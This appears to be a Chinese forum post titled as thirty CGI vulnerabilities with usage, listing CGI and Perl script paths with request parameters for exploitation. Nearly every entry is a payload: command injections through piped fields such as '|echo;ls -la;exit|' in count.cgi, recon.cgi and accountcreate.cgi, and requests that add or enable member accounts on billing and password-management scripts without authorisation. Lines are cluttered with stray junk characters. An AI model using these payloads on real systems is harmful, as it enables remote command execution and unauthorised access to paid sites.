Cgi-bin 30个漏洞＋使用方法

admin

==============================
7 e$ h5 N# p2 g; U& F2 a. C
/smspass.pl
7 D3 I9 G! D% m* q8 zusername=username&password=password
& O& h" V2 o: v$ ^8 w4 g" a2 a
/index.cgi
wei=ren&gen=command

/passmaster.cgi
Action=Add&Username=Username&Password=Password

) m4 T# X3 M" R2 \" ?* J/accountcreate.cgi
username=username&password=password&ref1=|echo;ls|
# A3 K8 u$ A$ |) ^5 p! K
' e, o8 D  k7 m% m: G" }$ [" f/form.cgi
name=xxxx&email=email&subject=xxxx&response=|echo;ls|

/addusr.pl
/cgi-bin/EuroDebit/addusr.pl
user=username&pass=Password&confirm=Password
  n4 W9 p! j1 i- o; u1 _3 |
/ccbill-local.asp
post_values=username:password

/count.cgi
. C# Q# b' h7 h5 Gpinfile=|echo;ls -la;exit|
7 _. \" n. e6 S+ o- w& l! y6 X: K4 Z
8 V2 p6 m+ F% o4 C9 i. C/recon.cgi
/recon.cgi?search
! r; v1 Q+ p: V  `: y3 ?searchoption=1&searchfor=|echo;ls -al;exit|
" v- M. o3 _; l
- L& B, C& P' ]' P: A% D/verotelrum.pl
- ^, B7 W! p3 d8 U- Xvercode=username:password:dseegsow:add:amount<&30>

7 {, ^- A( K5 P* H- N4 A/af.cgi
_browser_out=|echo;ls -la;exit;|

/modify.cgi
username=username&password=password&expire=30

8 R. F9 V- x. u6 V, R6 U2 n/openjournal.cgi
/ i# D7 b- `& I) F$ a3 Fedit=1&ct=2&go=|echo;ls -al;exit|

/gx9passwd.cgi
- i( O; L$ Y! P, M0 e6 Lcmd=ADD&user=username&pass=password
8 i* d2 G2 c) l* h4 t- d" ~$ a: s
/probecontrol.cgi
command=enable&username=username&password=password

$ K+ e% ?6 G8 m0 c- t; V: N/recon.cgi
/ y0 Q2 y0 c8 Z! m0 |9 \' r* u! Fsearchoption=3&searchfor=echo;ls -la;exit
* b* T# v9 M9 n1 ]8 \$ \
/htadd.pl
configfile=|echo; ls -alt; exit

. }3 u" G8 @1 ^' u3 ^  ~/gx9passwd.cgi
; _# m, W, f+ y8 v. C/ @9 jcmd=ADD&user=username&pass=password
$ q1 D+ [* L! x3 c# t
/ibill*.pl
) d3 U& j3 M3 Ereqtype=add&authpwd=authpwd&username=username&password=password
. \$ V/ V$ H' j3 A; x$ R% L8 j
/cpay.cgi
# v  f" ^/ F2 W- @3 U( w# Gcommand=add_member&username=username(EMAIL)&password=password(DES)
+ s; B# b) d6 [8 U9 [6 e& G: }
3 q$ o7 V3 R& |/globill_ut.cgi
do=add&username=username&password=password&wpassword=password
" N5 s) t. Q6 i$ D5 W
/usercontrol.cgi
command=enable&username=USER&password=PASS
  }  f1 C* `# S4 Y" `( j) T+ O
/globoSALErum.cgi
action=ADD&seccode=seccode&login=username&password=password

/addusr.pl
. L/ ~8 i* n- t4 D* g2 guser=USER&pass=PASS&confirm=PASS
" e: o. Z/ ~# v8 o1 t0 V7 x
9 ?8 E0 q: {; X) j1 R/pincount.cgi
# h8 Y7 v, U" \2 F- a% `/cgi-bin/mastergate/pincount.cgi
# P' ~. e/ Y9 q, Vpinfile=|echo;pwd;exit|
9 T8 N  \3 S; x: P/ D
/accountcreate.cgi
/cgi-bin/gateway/accountcreate.cgi
8 @  x. u- w$ T# i2 |, tusername=username&password=password&password2=password&ref1=|echo;ls -al;exit
0 A, u, y/ O# x( t' f
/af.cgi
/env.cgi
' m- ~; d6 }" kADD+;echo;pwd;exit
. \) a+ _3 p- M9 q* L$ ^; G  k
# g3 a0 Z8 x. Z4 l9 d& P4 o/count.cgi
pinfile=|echo;pwd;exit|
$ _: M+ q, S4 A  ]
/recon.cgi
4 ~9 E4 p! N* A5 Qsearchoption=1&searchfor=|echo;ls%20-al;exit|

) `$ X! b6 m" Z, h# L( E/add.cgi
username=username&password=password&expire=30
, Y9 c4 s9 x" J2 Q
7 Q5 _8 x. D# L, [: L==============================